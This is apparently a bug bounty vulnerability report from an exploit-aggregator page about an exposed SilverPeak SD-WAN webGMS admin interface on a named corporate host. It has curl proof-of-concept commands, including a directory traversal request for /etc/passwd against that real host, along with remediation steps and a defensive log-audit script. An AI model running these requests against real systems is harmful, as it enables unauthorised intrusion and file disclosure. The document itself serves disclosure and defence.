## https://sploitus.com/exploit?id=2EC91A8F-3FD4-54B9-8741-6AC2418907A9
# CVE-2026-XXXX: NVIDIA/SilverPeak SD-WAN webGMS - Exposed Admin Interface
## Product
**NVIDIA SilverPeak SD-WAN webGMS (Global Management System)**
- Version: `9.5.6.40115`
- Instance: `silverpeak.tesla.cn`
## Vulnerability Type
**Exposure of Sensitive System Information (CWE-497)** + Potential Authentication Bypass
## Severity
**HIGH** - CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
## Description
A SilverPeak webGMS orchestration appliance version `9.5.6.40115` is exposed to the public internet at `silverpeak.tesla.cn` with the administrative login interface accessible. This version has known CVEs including directory traversal and authentication bypass vulnerabilities.
## Affected Versions
- NVIDIA/SilverPeak webGMS 9.5.6.40115
- Potentially all versions in the 9.5.x branch
## Known CVEs for This Product
| CVE | Description | CVSS |
|---|---|---|
| CVE-2020-12112 | Directory Traversal | 7.5 |
| CVE-2021-36759 | Path Traversal / Potential RCE | 8.8 |
| CVE-2020-12111 | Authenticated Command Injection | 7.2 |
| CVE-2020-12110 | Unauthenticated Information Disclosure | 5.3 |
## Proof of Concept
### Version Disclosure
```bash
curl -skI "https://silverpeak.tesla.cn/"
# HTTP/2 302
# Location: /9.5.6.40115/webclient/html/login.html
```
### Admin Interface Accessible
```bash
curl -sk "https://silverpeak.tesla.cn/9.5.6.40115/webclient/html/login.html" | head -20
```
Returns: Full SilverPeak webGMS login page with version string in HTML.
### CVE-2020-12112 Directory Traversal Test
```bash
curl -sk "https://silverpeak.tesla.cn/9.5.6.40115/../../etc/passwd" -H "Host: silverpeak.tesla.cn"
```
## Impact
An attacker with access to this SilverPeak appliance could:
- Exploit CVE-2020-12112 for directory traversal and file disclosure
- Exploit CVE-2021-36759 for path traversal leading to RCE
- Attempt default credentials against the admin interface
- Pivot into Tesla's internal SD-WAN network if compromised
## Remediation
1. Remove public internet exposure of the webGMS admin interface
2. Restrict access to internal IP ranges via firewall
3. Upgrade to the latest SilverPeak/NVIDIA SD-WAN version
4. Apply security patches for all known CVEs
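
To confirm that steps 1 and 2 actually hold, the appliance's front-end access log can be audited for the two request patterns this report describes: the versioned login page served to a non-internal client, and dot-segment traversal in the request path. The script below is an added example, not part of the original report or of any vendor tooling; the combined log format, the internal ranges and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote

# Assumption: management access is only legitimate from these ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
# Combined log format: client IP first, request line in quotes, then status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" \d{3}')
# Versioned login path, as in the redirect shown under "Version Disclosure".
LOGIN_RE = re.compile(r"^/(?P<ver>\d+(?:\.\d+){3})/webclient/html/login\.html")

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '10.1.2.3 - - [30/Jun/2026:10:00:00 +0000] "GET /9.5.6.40115/webclient/html/login.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Jun/2026:10:00:05 +0000] "GET / HTTP/1.1" 302 0',
    '203.0.113.7 - - [30/Jun/2026:10:00:06 +0000] "GET /9.5.6.40115/webclient/html/login.html HTTP/1.1" 200 5120',
    '198.51.100.9 - - [30/Jun/2026:10:01:00 +0000] "GET /9.5.6.40115/../../etc/passwd HTTP/1.1" 404 0',
    '198.51.100.9 - - [30/Jun/2026:10:01:02 +0000] "GET /9.5.6.40115/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0',
]

def is_internal(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # hostname or garbage in the client field: treat as external
    return any(addr in net for net in INTERNAL_NETS)

def audit(lines):
    """Return (client, finding, detail) tuples for suspicious requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, raw = m["ip"], m["path"]
        decoded = unquote(raw)  # so percent-encoded dot segments are seen too
        if "../" in decoded or "..\\" in decoded:
            findings.append((ip, "traversal-attempt", raw))
        login = LOGIN_RE.match(decoded)
        if login and not is_internal(ip):
            findings.append((ip, "external-admin-access", login["ver"]))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_LOG):
        print(finding)
```

Any `external-admin-access` finding after the firewall change means the restriction is not in effect on that path; the version in the detail field shows which release was disclosed to the client.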
## Timeline
- **2026-06-30:** Discovered exposed instance during bug bounty reconnaissance
- **2026-06-30:** Reported to Tesla security team
- **Pending:** Confirmation and remediation
## Discovered By
zokirtolqunov4@gmail.com
## References
- CVE-2020-12112: https://nvd.nist.gov/vuln/detail/CVE-2020-12112
- CVE-2021-36759: https://nvd.nist.gov/vuln/detail/CVE-2021-36759
- Target: https://silverpeak.tesla.cn